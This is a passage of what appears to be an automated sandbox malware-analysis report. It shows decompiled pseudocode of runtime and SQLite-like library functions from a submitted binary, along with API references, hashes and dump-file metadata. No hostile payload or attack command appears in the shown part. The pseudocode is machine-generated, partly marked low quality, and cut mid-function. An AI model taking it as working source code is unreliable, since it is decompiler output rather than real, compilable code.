											_t146 = _t146 + 0xffffffc4;
											 *_t151 = _t79 + 0x3c;
											asm("adc ebx, 0xffffffff");
										}
										_t80 = E00E9F5C0(_t146, _t113, 0x3c, 0);
										_t114 = _t136;
										asm("cdq");
										_t148 = _t80 +  *(_t151 + 4);
										asm("adc ebx, edx");
										_t82 = L00E9F750(_t148, _t136, 0x3c, 0);
										 *(_t151 + 4) = _t82;
										__eflags = _t82;
										if(_t82 < 0) {
											_t148 = _t148 + 0xffffffc4;
											 *(_t151 + 4) = _t82 + 0x3c;
											asm("adc ebx, 0xffffffff");
										}
										_t83 = E00E9F5C0(_t148, _t114, 0x3c, 0);
										_t115 = _t136;
										asm("cdq");
										_t150 = _t83 +  *(_t151 + 8);
										asm("adc ebx, edx");
										_t85 = L00E9F750(_t150, _t136, 0x18, 0);
										 *(_t151 + 8) = _t85;
										__eflags = _t85;
										if(_t85 < 0) {
											_t150 = _t150 + 0xffffffe8;
											 *(_t151 + 8) = _t85 + 0x18;
											asm("adc ebx, 0xffffffff");
										}
										_t126 = E00E9F5C0(_t150, _t115, 0x18, 0);
										__eflags = _t136;
										if(__eflags < 0) {
											L44:
											 *(_t151 + 0xc) =  *(_t151 + 0xc) + _t126;
											asm("cdq");
											_t116 = 7;
											_t91 =  *(_t151 + 0xc);
											 *(_t151 + 0x18) = ( *(_t151 + 0x18) + 7 + _t126) % _t116;
											_t139 =  *((intOrPtr*)(_t151 + 0x1c)) + _t126;
											__eflags = _t91;
											if(_t91 > 0) {
												 *((intOrPtr*)(_t151 + 0x1c)) = _t139;
											} else {
												 *((intOrPtr*)(_t151 + 0x10)) = 0xb;
												 *((intOrPtr*)(_t151 + 0x14)) =  *((intOrPtr*)(_t151 + 0x14)) - 1;
												 *(_t151 + 0xc) = _t91 + 0x1f;
												 *((intOrPtr*)(_t151 + 0x1c)) = _t139 + 0x16d;
											}
											goto L47;
										} else {
											if(__eflags > 0) {
												L40:
												 *(_t151 + 0xc) =  *(_t151 + 0xc) + _t126;
												asm("cdq");
												_t117 = 7;
												 *((intOrPtr*)(_t151 + 0x1c)) =  *((intOrPtr*)(_t151 + 0x1c)) + _t126;
												 *(_t151 + 0x18) = ( *(_t151 + 0x18) + _t126) % _t117;
												L47:
												_t71 = 0;
												goto L12;
											}
											__eflags = _t126;
											if(_t126 == 0) {
												__eflags = _t136;
												if(__eflags > 0) {
													goto L47;
												}
												if(__eflags < 0) {
													goto L44;
												}
												__eflags = _t126;
												if(_t126 >= 0) {
													goto L47;
												}
												goto L44;
											}
											goto L40;
										}
									}
									_push(_t151);
									_t100 = E00E94412(_t113, _t145, _t151, __eflags, _t162);
									__eflags = _t100;
									if(_t100 == 0) {
										goto L30;
									}
									_t78 = _v12 + _v20;
									 *((intOrPtr*)(_t151 + 0x20)) = 1;
									goto L31;
								}
								if(__eflags < 0) {
									L21:
									asm("cdq");
									_push( &_v28);
									asm("sbb ebx, edx");
									_v28 = _t123 - _v12;
									_push(_t151);
									_v24 = _t111;
									_t71 = E00E87BF1();
									__eflags = _t71;
									if(_t71 != 0) {
										goto L12;
									}
									__eflags = _v16 - _t71;
									if(__eflags == 0) {
										goto L47;
									}
									_push(_t151);
									_t104 = E00E94412(_t111, _t141, _t151, __eflags, _t162);
									__eflags = _t104;
									if(_t104 == 0) {
										goto L47;
									}
									asm("cdq");
									_v28 = _v28 - _v20;
									_push( &_v28);
									asm("sbb [ebp-0x10], edx");
									_push(_t151);
									_t71 = E00E87BF1();
									__eflags = _t71;
									if(_t71 != 0) {
										goto L12;
									}
									 *((intOrPtr*)(_t151 + 0x20)) = 1;
									goto L47;
								}
								__eflags = _t136 - 0x935041fd;
								if(_t136 > 0x935041fd) {
									goto L26;
								}
								goto L21;
							}
							if(__eflags > 0) {
								L11:
								_t107 = E00E804D9(__eflags);
								_t153 = 0x16;
								 *_t107 = _t153;
								_t71 = _t153;
								goto L12;
							}
							__eflags =  *_t141 - 0x93582aff;
							if(__eflags <= 0) {
								goto L15;
							}
							goto L11;
						}
						if(__eflags < 0) {
							goto L11;
						}
						__eflags =  *_t141;
						if(__eflags < 0) {
							goto L11;
						}
						goto L8;
					}
					_t108 = E00E804D9(__eflags);
					_t154 = 0x16;
					 *_t108 = _t154;
					L00E7CF02();
					_t71 = _t154;
					goto L13;
				}
				_t69 = E00E804D9(_t161);
				_t155 = 0x16;
				 *_t69 = _t155;
				L00E7CF02();
				_t71 = _t155;
				goto L14;
			}

0x00e891b8
0x00e891b8
0x00e891c0
0x00e891c5
0x00e891c6
0x00e891c8
0x00e891c9
0x00e891cb
0x00e891ce
0x00e891cf
0x00e891d2
0x00e891d4
0x00000000
0x00000000
0x00e891e9
0x00e891f1
0x00e891f2
0x00e891f2
0x00e891f4
0x00e891f7
0x00e891f9
0x00e8920e
0x00e89211
0x00e89214
0x00e8921c
0x00e8921e
0x00e8921f
0x00e89222
0x00e8923f
0x00e8923f
0x00e89247
0x00e8924b
0x00e8924e
0x00e89251
0x00e89257
0x00e89259
0x00e8944a
0x00e8944a
0x00e8944b
0x00e8944c
0x00e8944d
0x00e8944e
0x00e8944f
0x00e89454
0x00e8945a
0x00000000
0x00e8945a
0x00e89263
0x00e89269
0x00e8926b
0x00000000
0x00000000
0x00e89275
0x00e8927b
0x00e8927d
0x00000000
0x00000000
0x00e89283
0x00e89287
0x00e8928a
0x00e89292
0x00e89295
0x00e89298
0x00e89308
0x00e89308
0x00e89309
0x00e8930a
0x00e89311
0x00e89313
0x00e8923a
0x00e8923b
0x00e8923c
0x00e8923e
0x00e8923e
0x00e89319
0x00e8931f
0x00e89320
0x00e89322
0x00e89324
0x00e89340
0x00e89340
0x00e89343
0x00e89343
0x00e89344
0x00e8934a
0x00e8934e
0x00e89353
0x00e89355
0x00e89357
0x00e8935c
0x00e8935f
0x00e89361
0x00e89361
0x00e8936a
0x00e89371
0x00e89376
0x00e89377
0x00e8937d
0x00e89381
0x00e89386
0x00e89389
0x00e8938b
0x00e89390
0x00e89393
0x00e89396
0x00e89396
0x00e8939f
0x00e893a6
0x00e893ab
0x00e893ac
0x00e893b2
0x00e893b6
0x00e893bb
0x00e893be
0x00e893c0
0x00e893c5
0x00e893c8
0x00e893cb
0x00e893cb
0x00e893d9
0x00e893db
0x00e893dd
0x00e89405
0x00e8940b
0x00e89412
0x00e89413
0x00e89416
0x00e89419
0x00e8941f
0x00e89421
0x00e89423
0x00e89440
0x00e89425
0x00e89428
0x00e8942f
0x00e89432
0x00e8943b
0x00e8943b
0x00000000
0x00e893df
0x00e893df
0x00e893e5
0x00e893ea
0x00e893ef
0x00e893f0
0x00e893f3
0x00e893f6
0x00e89443
0x00e89443
0x00000000
0x00e89443
0x00e893e1
0x00e893e3
0x00e893fb
0x00e893fd
0x00000000
0x00000000
0x00e893ff
0x00000000
0x00000000
0x00e89401
0x00e89403
0x00000000
0x00000000
0x00000000
0x00e89403
0x00000000
0x00e893e3
0x00e893dd
0x00e89326
0x00e89327
0x00e8932d
0x00e8932f
0x00000000
0x00000000
0x00e89334
0x00e89337
0x00000000
0x00e89337
0x00e8929a
0x00e892a4
0x00e892a7
0x00e892ad
0x00e892ae
0x00e892b0
0x00e892b3
0x00e892b4
0x00e892b7
0x00e892be
0x00e892c0
0x00000000
0x00000000
0x00e892c6
0x00e892c9
0x00000000
0x00000000
0x00e892cf
0x00e892d0
0x00e892d6
0x00e892d8
0x00000000
0x00000000
0x00e892e1
0x00e892e2
0x00e892e8
0x00e892e9
0x00e892ec
0x00e892ed
0x00e892f4
0x00e892f6
0x00000000
0x00000000
0x00e892fc
0x00000000
0x00e892fc
0x00e8929c
0x00e892a2
0x00000000
0x00000000
0x00000000
0x00e892a2
0x00e89224
0x00e8922e
0x00e8922e
0x00e89235
0x00e89236
0x00e89238
0x00000000
0x00e89238
0x00e89226
0x00e8922c
0x00000000
0x00000000
0x00000000
0x00e8922c
0x00e89216
0x00000000
0x00000000
0x00e89218
0x00e8921a
0x00000000
0x00000000
0x00000000
0x00e8921a
0x00e891fb
0x00e89202
0x00e89203
0x00e89205
0x00e8920a
0x00000000
0x00e8920a
0x00e891d6
0x00e891dd
0x00e891de
0x00e891e0
0x00e891e5
0x00000000

APIs

Part of subcall function 00E8908E: CloseHandle.KERNEL32(?,?,?,00E891C5,?,?,00D979A9,00000000), ref: 00E890BF
Part of subcall function 00E8908E: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00E891C5,?,?,00D979A9,00000000), ref: 00E890D5
Part of subcall function 00E8908E: ExitThread.KERNEL32 ref: 00E890DE

__allrem.LIBCMT ref: 00E8934E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E8936A
__allrem.LIBCMT ref: 00E89381
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E8939F
__allrem.LIBCMT ref: 00E893B6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E893D4

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$ExitThread$CloseFreeHandleLibrary
String ID:
API String ID: 1885649644-0
Opcode ID: 3e89981e2071c82607c79a196ef2e67c0e0c0924f412942c076ab5de09b027da
Instruction ID: 1963bd71c69d326473629ce2c03d03352b6eac1bed236e5990388191894a9f24
Opcode Fuzzy Hash: 3e89981e2071c82607c79a196ef2e67c0e0c0924f412942c076ab5de09b027da
Instruction Fuzzy Hash: 65811871E00702ABDB24BE28DC81B7A73E9AF45724F289529F46DF72D2E770D9018790

Uniqueness

Uniqueness Score: -1.00%

Function 00E898C9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00E898C9(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xeab30c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00e898cf
0x00e898d3
0x00e898de
0x00e898e6
0x00e898f1
0x00e898f7
0x00e898fb
0x00e89902
0x00e89908
0x00e89908
0x00e8990a
0x00e8990f
0x00000000
0x00e89914
0x00e8991b

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00E898BE,00000000,?,00E89886,00000000,?,00000000), ref: 00E898DE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E898F1
FreeLibrary.KERNEL32(00000000,?,?,00E898BE,00000000,?,00E89886,00000000,?,00000000), ref: 00E89914

Strings

mscoree.dll, xrefs: 00E898D7
CorExitProcess, xrefs: 00E898E9

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 365d0d02591ef6378d4619099b7363b8651a45a87c8f24ad8ca957181cd4ae32
Instruction ID: ae31d43da53505c9a6b57a0f73e47acb98d80f83a7c88d7945c61e5ea54dc1cb
Opcode Fuzzy Hash: 365d0d02591ef6378d4619099b7363b8651a45a87c8f24ad8ca957181cd4ae32
Instruction Fuzzy Hash: 6DF0A730902218FFCB11AB52DD09BDEBB78FF45756F140064F409B11A2DB749E04DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E76CDB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00E76CDB(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0xede478;
				if(_t7 == 0) {
					LeaveCriticalSection(0xede460);
					_t3 = WaitForSingleObjectEx( *0xede45c, _a4, 0);
					EnterCriticalSection(0xede460);
					return _t3;
				}
				 *0xeab30c(0xede458, 0xede460, _a4);
				return  *_t7();
			}

0x00e76cdf
0x00e76ce7
0x00e76d08
0x00e76d19
0x00e76d20
0x00000000
0x00e76d20
0x00e76cf8
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,00E76C78,00000064), ref: 00E76CFE
LeaveCriticalSection.KERNEL32(00EDE460,?,?,00E76C78,00000064,?,?,?,00E3E1B8,00EDD130,CCEBFC3B,?,00EA1071,000000FF,?,00D91068), ref: 00E76D08
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00E76C78,00000064,?,?,?,00E3E1B8,00EDD130,CCEBFC3B,?,00EA1071,000000FF,?,00D91068), ref: 00E76D19
EnterCriticalSection.KERNEL32(00EDE460,?,00E76C78,00000064,?,?,?,00E3E1B8,00EDD130,CCEBFC3B,?,00EA1071,000000FF,?,00D91068), ref: 00E76D20

Strings

`, xrefs: 00E76D02

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: `
API String ID: 3269011525-4168407445
Opcode ID: 2069cffb08828dc26c9db3ff21c5c962e8b2883131f0cebe96f0b6ae5b65d58c
Instruction ID: 423c2c15aea2a28401331018f195acc5b8220b584715f5b19ae6369affc647f5
Opcode Fuzzy Hash: 2069cffb08828dc26c9db3ff21c5c962e8b2883131f0cebe96f0b6ae5b65d58c
Instruction Fuzzy Hash: 47E01235641628AFDB113B52FD0DBCD3F28EB0E755B059012F5197A371C76128059BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00E96878 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E96878(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xed89d0; // 0xed8a24
					if(_t23 != 0) {
						E00E8EC89(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xed89d4; // 0xede740
					if(_t24 != 0) {
						E00E8EC89(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xed89d8; // 0xede740
					if(_t25 != 0) {
						E00E8EC89(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xed8a00; // 0xed8a28
					if(_t26 != 0) {
						E00E8EC89(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xed8a04; // 0xede744
					if(_t27 != 0) {
						return E00E8EC89(_t6);
					}
				}
				return _t6;
			}

0x00e9687e
0x00e96883
0x00e96887
0x00e9688d
0x00e96890
0x00e96895
0x00e96899
0x00e9689f
0x00e968a2
0x00e968a7
0x00e968ab
0x00e968b1
0x00e968b4
0x00e968b9
0x00e968bd
0x00e968c3
0x00e968c6
0x00e968cb
0x00e968cc
0x00e968cf
0x00e968d5
0x00000000
0x00e968dd
0x00e968d5
0x00e968e0

APIs

_free.LIBCMT ref: 00E96890

Part of subcall function 00E8EC89: HeapFree.KERNEL32(00000000,00000000,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?), ref: 00E8EC9F
Part of subcall function 00E8EC89: GetLastError.KERNEL32(?,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?,?), ref: 00E8ECB1

_free.LIBCMT ref: 00E968A2
_free.LIBCMT ref: 00E968B4
_free.LIBCMT ref: 00E968C6
_free.LIBCMT ref: 00E968D8

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8dae0744d284daa05d2454d1649a35c26f996d8bfefe84e344496ead52840de
Instruction ID: be6391ac80022df112188c2c6e351e10ca500f5f2cd414fb80b262c5119f12bb
Opcode Fuzzy Hash: f8dae0744d284daa05d2454d1649a35c26f996d8bfefe84e344496ead52840de
Instruction Fuzzy Hash: 93F06232902260AFCAB4EB55F7A5C16B3D9EB403157552807F04CF7A01CB31FC8047A4

Uniqueness

Uniqueness Score: -1.00%

Function 00DD7030 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00DD7030(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t32;
				void* _t33;
				intOrPtr* _t34;
				intOrPtr* _t40;
				intOrPtr _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				void* _t55;
				void* _t56;
				intOrPtr* _t57;
				signed int _t59;
				intOrPtr* _t64;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				void* _t73;

				_t49 = __edx;
				_push(__ecx);
				_push(_t33);
				_push(_t56);
				_t34 = E00DBB270(_t33, _t56,  *_a12);
				_t62 = ( *((intOrPtr*)(_t34 + 0xc)) + 1) * 0x19;
				asm("cdq");
				_t57 = L00D94E70(( *((intOrPtr*)(_t34 + 0xc)) + 1) * 0x19, _t49);
				_t70 = (_t67 & 0xfffffff8) + 0xc;
				_v8 = _t57;
				if(_t57 == 0) {
					_t21 = E00DBBCE0(_a4);
					goto L14;
				} else {
					E00E79BD0(_t57, _t57, 0, _t62);
					_push(0);
					E00D976B0(_t34, _t57, 0x18, _t57, "%llu",  *_t34);
					_t40 = _t57;
					_t73 = _t70 + 0x20;
					_t4 = _t40 + 1; // 0x1
					_t50 = _t4;
					do {
						_t24 =  *_t40;
						_t40 = _t40 + 1;
					} while (_t24 != 0);
					_t64 = (_t40 - _t50 & 0x3fffffff) + _t57;
					_t59 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) > 0) {
						do {
							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x18)) + _t59 * 4)) + 1;
							asm("adc eax, eax");
							asm("adc eax, 0xffffffff");
							_t28 = E00E76D30( *_t34 + _t54 + 0xffffffff, 0, _t54, 0);
							_push(_t54);
							E00D976B0(_t34, _t59, 0x18, _t64, " %llu", _t28);
							_t73 = _t73 + 0x14;
							if(_t64 != 0) {
								_t30 = _t64;
								_t55 = _t30 + 1;
								do {
									_t48 =  *_t30;
									_t30 = _t30 + 1;
								} while (_t48 != 0);
								_t32 = _t30 - _t55 & 0x3fffffff;
							} else {
								_t32 = 0;
							}
							_t59 = _t59 + 1;
							_t64 = _t64 + _t32;
						} while (_t59 <  *((intOrPtr*)(_t34 + 0xc)));
					}
					_t65 = _a4;
					_t21 = E00DB5560( *_t65, _v8, 0xffffffff, 1, E00D95050);
					if(_t21 != 0x12) {
						L14:
						return _t21;
					} else {
						 *((intOrPtr*)(_t65 + 0x14)) = _t21;
						 *((char*)(_t65 + 0x19)) = 1;
						return E00DB5560( *_t65, "string or blob too big", 0xffffffff, 1, 0);
					}
				}
			}

0x00dd7030
0x00dd7036
0x00dd703a
0x00dd703c
0x00dd7044
0x00dd704d
0x00dd7052
0x00dd705a
0x00dd705c
0x00dd705f
0x00dd7065
0x00dd714b
0x00000000
0x00dd706b
0x00dd706f
0x00dd7077
0x00dd7083
0x00dd7088
0x00dd708a
0x00dd708d
0x00dd708d
0x00dd7090
0x00dd7090
0x00dd7092
0x00dd7093
0x00dd709f
0x00dd70a2
0x00dd70a7
0x00dd70b0
0x00dd70bc
0x00dd70c0
0x00dd70c5
0x00dd70ca
0x00dd70cf
0x00dd70d9
0x00dd70de
0x00dd70e3
0x00dd70e9
0x00dd70eb
0x00dd70f0
0x00dd70f0
0x00dd70f2
0x00dd70f3
0x00dd70f9
0x00dd70e5
0x00dd70e5
0x00dd70e5
0x00dd70fe
0x00dd70ff
0x00dd7101
0x00dd70b0
0x00dd7106
0x00dd7118
0x00dd7123
0x00dd7153
0x00dd7159
0x00dd7125
0x00dd7132
0x00dd7135
0x00dd7147
0x00dd7147
0x00dd7123

APIs

__aulldiv.LIBCMT ref: 00DD70CA

Strings

%llu, xrefs: 00DD70D1
string or blob too big, xrefs: 00DD7127
%llu, xrefs: 00DD707B

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: %llu$%llu$string or blob too big
API String ID: 3732870572-3890766324
Opcode ID: dc75293b48947503a5976a0a20078d68564d889e417a8c19bb6edaf6238817e8
Instruction ID: fd1cd78e4570dcca7c752b4451eeec7727095f89023e8d627a677bdf0b243a1f
Opcode Fuzzy Hash: dc75293b48947503a5976a0a20078d68564d889e417a8c19bb6edaf6238817e8
Instruction Fuzzy Hash: 77316F726442006BCB209E289C02FBB3765DB85734F188369FD695B3C2EA62990587F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A210 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00D9A24B

Strings

winTruncate1, xrefs: 00D9A2B7
winTruncate2, xrefs: 00D9A2E5
winSeekFile, xrefs: 00D9A29A

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2
API String ID: 2933888876-2471937615
Opcode ID: b74694f44a0282a4fc6b0af6d0f6e5b9b4bb7905478e7b9ee0f8a8ac3d34d2b2
Instruction ID: 3f29e3ad84381247c7ab6eca2b8fda56dd246eb3895ff728e1f215ca9601d43e
Opcode Fuzzy Hash: b74694f44a0282a4fc6b0af6d0f6e5b9b4bb7905478e7b9ee0f8a8ac3d34d2b2
Instruction Fuzzy Hash: 1731A0712047019FCB20CF69DD85A6BB7E5FB84710F048A2EF896D7690DA31E8048BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D993A0 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D993CA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D993EC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D9943D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D99487

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv
String ID:
API String ID: 3650730422-0
Opcode ID: 887b219030dd3434d48d0f4cb63dcf91feeda41761c77072652a3ecff68b65e3
Instruction ID: 0e6fd366d2ad3579ecbd0a38a6e0a565516341052f445e5dd3c5e1c5f7af5377
Opcode Fuzzy Hash: 887b219030dd3434d48d0f4cb63dcf91feeda41761c77072652a3ecff68b65e3
Instruction Fuzzy Hash: F031203670161467DF36599DDCA1B6EF798DB81730F28423EFD19DB281E5628C4381B8

Uniqueness

Uniqueness Score: -1.00%

Function 00E8E6B1 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00E8CB41,?,?,00E94238,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00E8E6B6
_free.LIBCMT ref: 00E8E713
_free.LIBCMT ref: 00E8E749
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00E94238,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00E8E754

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 397895ac5c3a61bcf81ff170d4bdeced023fffa4a2196c3ac44bf2e7d040ce38
Instruction ID: 24d5beccb07a059d5e458063f503f4a079a1705369266436e10c5ba6bd4e5c7d
Opcode Fuzzy Hash: 397895ac5c3a61bcf81ff170d4bdeced023fffa4a2196c3ac44bf2e7d040ce38
